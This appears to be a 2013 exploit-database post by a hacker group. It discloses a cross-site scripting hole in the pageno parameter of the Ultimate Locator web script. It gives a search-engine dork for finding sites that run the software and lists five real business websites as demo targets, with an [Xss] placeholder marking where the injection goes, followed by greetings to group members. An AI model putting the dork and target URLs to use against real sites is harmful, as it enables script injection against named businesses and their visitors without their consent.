facebook facebook twitter rss

Ultimate Locator Cross-Site Scripting Vulnerability

Author: IrIsT Security & Researcher Team , Published: 20-01-2013
################################################################################
#
# Exploit Title : Ultimate Locator Cross-Site Scripting Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Beni_Vanda
#
# Home : http://IrIsT.Ir/forum
#
# Software Link : http://www.ultimatelocator.com/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - BT - win7, Fedora
#
# Dork : intext:"powered by Ultimate Locator"
#
################################################################################
#
# Expl0iTs :
#
# http://target/locator/results_list.php?pageno=[Xss]
#
#
# D3mo :
#
# http://merryhempsters.com/locator/results_list.php?pageno=3360&&state=CA&order=id&radius=50[Xss]
# http://www.gingerpeople.com/locator/results_list.php?pageno=5499&&state=ID&order=id&radius=100[xss]
# http://www.heelyscanada.com/live/locator/results_list.php?pageno=4&&state=ON&order=id&radius=10[xss]
# http://www.zipfizz.com/locator/results_list.php?pageno=527&&state=DE&order=id&radius=100[xss]
# http://www.allowaystandard.com/locator/results_list.php?pageno=17&&country=US&countryname=United+States&order=id&radius=100[xss]
#
################################################################################
#
# Greats : Am!r - C0dex - B3HZ4D - TaK.FaNaR - Dead.Zone - BestC0d3r - esikley
#
# m3hdi - F@rid - Dr.Tofan - Dj.TiniVini - Nimaark - Spy Developer - one hacker alone
#
# && All Members In Www.IrIsT.Ir/forum
#
################################################################################

Like us on Facebook :